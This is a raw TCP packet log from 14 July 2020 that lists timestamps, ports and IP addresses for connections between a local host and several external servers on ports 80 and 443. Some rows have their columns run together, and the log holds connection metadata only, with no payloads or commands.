                                                                                                                                      Jul 14, 2020 11:20:24.672050953 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672066927 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672096968 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672117949 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672137022 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672156096 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672174931 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672198057 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672199965 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672230959 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672261000 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672281027 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672316074 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672322035 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672329903 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672339916 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672368050 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672390938 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672408104 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672432899 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672458887 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672482967 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672492027 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.672508955 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672538042 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672558069 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672576904 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672602892 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672601938 CEST4970480192.168.1.1025.101.51.247
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jul 14, 2020 11:20:24.672633886 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672657013 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672677040 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672693968 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672709942 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672728062 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672746897 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672784090 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672795057 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672800064 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672820091 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672825098 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672836065 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672853947 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672867060 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.672883034 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672910929 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672930956 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672950029 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672969103 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.672987938 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673005104 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673023939 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673046112 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673064947 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673084021 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673109055 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673129082 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.673135996 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673166990 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673192978 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673211098 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673230886 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673249960 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673269033 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673286915 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673307896 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673325062 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673346043 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673377991 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673404932 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673428059 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673445940 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673451900 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673470974 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673484087 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673501968 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673501968 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.673559904 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673573971 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673585892 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673609972 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673638105 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673662901 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673705101 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673718929 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673729897 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673759937 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673765898 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.673816919 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673841953 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673858881 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673875093 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673891068 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673907995 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673928976 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673948050 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673966885 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.673989058 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.674000025 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.674092054 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.878663063 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.878979921 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:24.943743944 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:24.943994999 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.008776903 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.008827925 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.009047985 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.009094954 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.074001074 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.074031115 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.074052095 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.074070930 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.074220896 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.074274063 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.074291945 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.074305058 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.139056921 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.139107943 CEST  80           49704      5.101.51.247     192.168.1.102
Jul 14, 2020 11:20:25.139347076 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:25.139401913 CEST  49704        80         192.168.1.102    5.101.51.247
Jul 14, 2020 11:20:33.892447948 CEST  49705        80         192.168.1.102    54.225.191.113
Jul 14, 2020 11:20:33.989675999 CEST  80           49705      54.225.191.113   192.168.1.102
Jul 14, 2020 11:20:33.989976883 CEST  49705        80         192.168.1.102    54.225.191.113
Jul 14, 2020 11:20:33.993360996 CEST  49705        80         192.168.1.102    54.225.191.113
Jul 14, 2020 11:20:34.090523958 CEST  80           49705      54.225.191.113   192.168.1.102
Jul 14, 2020 11:20:34.096435070 CEST  80           49705      54.225.191.113   192.168.1.102
Jul 14, 2020 11:20:34.096693039 CEST  49705        80         192.168.1.102    54.225.191.113
Jul 14, 2020 11:20:34.469486952 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:34.529658079 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:34.529912949 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:34.531091928 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:34.591231108 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:34.623135090 CEST  80           49706      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:34.623277903 CEST  49706        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:34.841288090 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:34.969506025 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:34.970705032 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.021271944 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.149497986 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.155380011 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.155417919 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.155435085 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.155644894 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.234585047 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.363213062 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.363540888 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.403039932 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.531564951 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531631947 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531661987 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531683922 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531702995 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531727076 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531739950 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.531754017 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531770945 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531790972 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.531923056 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.659940958 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660003901 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660026073 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660064936 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660094023 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660114050 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660132885 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660171032 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660191059 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660209894 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660228968 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660247087 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660258055 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.660267115 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660286903 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660306931 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660325050 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660343885 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660362959 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.660514116 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.788597107 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788680077 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788723946 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788765907 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788815022 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788853884 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788889885 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788928032 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.788968086 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:35.789073944 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:35.789239883 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:40.144016027 CEST  49708        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:40.203697920 CEST  80           49708      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:40.204034090 CEST  49708        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:40.204413891 CEST  49708        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:40.263976097 CEST  80           49708      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:40.264117956 CEST  49708        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:40.323795080 CEST  80           49708      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:40.383061886 CEST  80           49708      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:40.383109093 CEST  80           49708      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:40.383207083 CEST  49708        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:40.404150009 CEST  49708        80         192.168.1.102    91.218.231.226
Jul 14, 2020 11:20:40.463787079 CEST  80           49708      91.218.231.226   192.168.1.102
Jul 14, 2020 11:20:41.062810898 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:41.062851906 CEST  443          49707      185.206.163.136  192.168.1.102
Jul 14, 2020 11:20:41.062936068 CEST  49707        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:43.650592089 CEST  49709        443        192.168.1.102    185.206.163.136
Jul 14, 2020 11:20:43.782231092 CEST  443          49709      185.206.163.136  192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:43.782454967 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.786017895 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.917606115 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:43.917773962 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:43.918081999 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.919476986 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:43.923821926 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.055322886 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055640936 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055748940 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055764914 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055784941 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.055789948 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055803061 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055814981 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055830002 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055841923 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.055845976 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055860043 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.055946112 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.187455893 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187515020 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187555075 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187578917 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187598944 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187628031 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187653065 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.187659025 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187668085 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187689066 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187707901 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187727928 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187747002 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187767029 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187788963 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187808990 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.187810898 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187834024 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187855959 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187879086 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.187992096 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.319418907 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319559097 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319572926 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.319591045 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319617987 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319642067 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319665909 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319694996 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319721937 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319724083 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.319737911 CEST44349709185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.319885015 CEST49709443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.568655014 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.568712950 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.573837996 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.696876049 CEST44349707185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.697072029 CEST49707443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.702330112 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.702523947 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.707282066 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.835803032 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.835906982 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.836059093 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.843225002 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.849524021 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.978125095 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978219986 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978276014 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978302956 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978327990 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978352070 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978377104 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978404045 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978429079 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978456020 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:44.978458881 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978485107 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:44.978584051 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.107043982 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107073069 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107090950 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107119083 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107141972 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107160091 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107177019 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107193947 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107228994 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107247114 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107264996 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107311010 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107333899 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.107340097 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107367992 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107397079 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107423067 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107443094 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107456923 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.107464075 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107484102 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107501984 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.107597113 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236192942 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236289978 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236346006 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236412048 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236466885 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236557961 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236588955 CEST44349710185.206.163.136192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:45.236605883 CEST49710443192.168.1.102185.206.163.136
                                                                                                                                      Jul 14, 2020 11:20:45.236627102 CEST44349710185.206.163.136192.168.1.102
